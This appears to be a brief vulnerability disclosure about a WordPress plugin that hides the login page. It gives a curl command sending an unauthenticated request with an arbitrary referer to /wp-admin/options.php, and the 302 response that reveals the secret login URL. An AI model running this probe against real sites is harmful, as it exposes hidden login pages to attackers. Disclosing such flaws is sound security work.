The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302
...
location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth=1